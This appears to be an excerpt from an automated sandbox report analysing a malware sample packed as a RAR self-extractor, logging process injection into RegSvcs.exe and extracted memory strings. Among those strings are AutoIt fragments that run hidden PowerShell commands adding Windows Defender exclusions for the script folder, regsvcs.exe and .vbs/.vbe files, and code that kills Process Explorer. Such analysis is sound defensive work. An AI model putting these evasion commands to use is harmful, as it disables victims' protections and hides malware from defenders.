              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 401000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: D1B008
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: DE4000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 401000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 10EC008
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FFF000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 401000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: ED8008
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 400000
              Source: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FED000
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00591A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_00591A91
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00533312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,8_2_00533312
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")memstr_1f973cc1-7
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitemsmemstr_e6f0f7aa-9
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamememstr_ca39ea57-9
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nextmemstr_1ed62637-1
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usbmemstr_8706e798-b
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>antivirusmemstr_c45f1cb3-a
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()memstr_8c18e009-4
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" thenmemstr_6f60a228-0
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadminmemstr_ef05a048-9
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)memstr_aef9bcb3-e
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)memstr_316c4368-0
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)memstr_a5668c17-7
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)memstr_e7e30ea0-c
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)memstr_a3366ca8-6
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)memstr_feac7590-1
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endifmemstr_7237b3a6-d
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>disablermemstr_650c9068-6
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()memstr_aa28d605-8
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenmemstr_ead16601-c
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")memstr_bff7f52a-5
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.00000000074BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")memstr_c1b044a6-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: unknown exceptionmemstr_37433f53-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad array new lengthmemstr_944a6ff6-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: string too longmemstr_6b8361f4-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vector too longmemstr_0d8de063-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: unknown exceptionbad array new lengthstring too longvector too long*memstr_f581c5f4-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: invalid string positionmemstr_3830357d-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: rrhhcxxcinvalid string positionmemstr_bb5785d1-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ::$attribute_list::$bitmap::$data::$ea::$ea_information::$file_name::$index_allocation:$i30:$index_allocation::$index_root::$logged_utility_stream:$efs:$logged_utility_stream:$txf_data:$logged_utility_stream::$object_id::$reparse_point.\sesecurityprivilegeserestoreprivilegesecreatesymboliclinkprivilege\??\unc\\aclstm..__tmp_reference_source_rtmp0memstr_4610bdb5-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: select * from win32_operatingsystemmemstr_90fd780d-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: *messages***memstr_752e78b9-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rartemp.root\cimv2select * from win32_operatingsystemwqlnamewindows 10*?\\?\.rarexesfxrar00?*<>|"?*uncconprnauxnulcom#lpt#*messages****messages***r!memstr_54be1445-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: cryptprotectmemorymemstr_79038e4b-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: cryptunprotectmemorymemstr_e06ce813-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:stringsdialogmenudirectionrtl$%s:@%s: ,s$%s@%s$%s:%s$%s:captionsizecrypt32.dllcryptprotectmemorycryptunprotectmemorycryptprotectmemory failedcryptunprotectmemory failedmemstr_decf94ce-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xlistposmemstr_dd3db6ff-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlldirectorywmemstr_57439bb0-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdefaultdlldirectoriesmemstr_8a3aab12-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xlistposkernel32setdlldirectorywsetdefaultdlldirectoriesversion.dlldxgidebug.dllsfc_os.dllsspicli.dllrsaenh.dlluxtheme.dlldwmapi.dllcryptbase.dlllpk.dllusp10.dllclbcatq.dllcomres.dllws2_32.dllws2help.dllpsapi.dllieframe.dllntshrui.dllatl.dllsetupapi.dllapphelp.dlluserenv.dllnetapi32.dllshdocvw.dllcrypt32.dllmsasn1.dllcryptui.dllwintrust.dllshell32.dllsecur32.dllcabinet.dlloleaccrc.dllntmarta.dllprofapi.dllwindowscodecs.dllsrvcli.dllcscapi.dllslc.dllimageres.dlldnsapi.dlliphlpapi.dllwinnsi.dllnetutils.dllmpr.dlldevrtl.dllpropsys.dllmlang.dllsamcli.dllsamlib.dllwkscli.dlldfscli.dllbrowcli.dllrasadhlp.dlldhcpcsvc6.dlldhcpcsvc.dllxmllite.dlllinkinfo.dllcryptsp.dllrpcrtremote.dllaclui.dlldsrole.dllpeerdist.dlluxtheme.dllplease remove %s from %s folder. it is unsecure to run %s until it is done.createthread failedmemstr_0c9b40fd-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitformultipleobjects error %d, getlasterror %dmemstr_c2df3e4e-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: thread pool initialization failed.%ls>%s: %smemstr_e4d7d920-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad allocationmemstr_7ad33266-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: rarhtmlclassnameshell.explorerabout:blank<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head><html><style>body{font-family:"arial";font-size:12;}</style></html>memstr_aab30c5a-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: </p><br>memstr_dac0dd8f-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <style></style>&nbsp;memstr_acdda5a7-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_browsetitlememstr_3a847fba-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmdextractingmemstr_b5ad724d-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_skippingmemstr_7b3a0f22-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unexpeofmemstr_56c78705-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_fileheaderbrokenmemstr_aa952155-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_headerbrokenmemstr_8eb6d98f-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_mainheaderbrokenmemstr_e568627d-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmtheaderbrokenmemstr_cbaf03ec-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmtbrokenmemstr_fa883011-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_outofmemoryerrormemstr_62adcffa-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unknownmethodmemstr_5e433128-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotopenmemstr_1446d175-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatememstr_a2f078d2-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotmkdirmemstr_eb0a8fbc-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_encrcrcfailedmemstr_c56a9827-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrcrcfailedmemstr_7229eecf-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_packeddatacrcfailedmemstr_10030f78-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_writeerrormemstr_7dcd9eb1-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_readerrormemstr_b0889a95-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_closeerrormemstr_cda063af-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotfindvolmemstr_30827e21-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_badarchivememstr_8595bd31-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractingmemstr_6fb5d684-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_asknextvoltitlememstr_1ca2c786-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_archeaderbrokenmemstr_3a3654d7-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_donememstr_b5bd0ed3-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errormemstr_2587e0e9-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errorsmemstr_2f90e108-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_bytesmemstr_50d6f819-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_modifiedonmemstr_94b78652-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_badfoldermemstr_cd7b77e4-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_createerrorsmemstr_9a9d35fd-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_restarthintmemstr_b7dcfb8f-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_crcerrorsmemstr_76717ae9-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_allfilesmemstr_07e18a05-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title1memstr_ff47db5a-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title1amemstr_b7d37719-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title2memstr_fb47fdc8-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title3memstr_07bd5c19-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title4memstr_270a6f59-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title5memstr_2ea39a2c-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title6memstr_8e64bb8b-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_arcbrokenmemstr_652cf88f-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrfilestomemstr_5b5d9169-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrfilestotempmemstr_702ac2df-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractbuttonmemstr_661b9e32-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractprogressmemstr_6062c187-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_maxpathlimitmemstr_d759f3fc-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unkencmethodmemstr_c70bc308-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_wrongpasswordmemstr_98f20993-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_wrongfilepasswordmemstr_28d4dbc3-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_copyerrormemstr_c3fc0d6e-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatelnksmemstr_effb7cd5-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatelnkhmemstr_ee1a1ad3-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errlnktargetmemstr_14849dbb-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_needadminmemstr_97fc087f-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_pausememstr_e9f41f17-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_continuememstr_e29019bd-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_secwarningmemstr_6c7322bf-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_secdeldllmemstr_fff3a8f6-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrdictoutmemmemstr_dd5ee50e-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_suggest64bitmemstr_e01dd57c-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_warningmemstr_ec8af235-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_dictexceedsrammemstr_c6d3b03e-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_dictsuggestcancelmemstr_d70003c1-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractioncancelledmemstr_2ce1366c-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:sizememstr_9c9f4974-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:captionmemstr_e04ab695-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_destedittitlememstr_1a64d13d-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_changedirmemstr_90854546-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_progressbartitlememstr_020e704c-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idokmemstr_b9f40dbc-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idcancelmemstr_137c66a8-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:sizememstr_ccf27b85-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:captionmemstr_ad6e80e1-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrfileexistsmemstr_14c16798-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owraskreplacememstr_897ccf72-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrquestionmemstr_6bba522f-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owryesmemstr_b620a36f-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrallmemstr_36359bbb-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrrenamememstr_621f6120-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrnomemstr_63c53c8e-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrnoallmemstr_5ad6a5a8-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrcancelmemstr_ebaaa4c9-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:sizememstr_c8b44eda-a
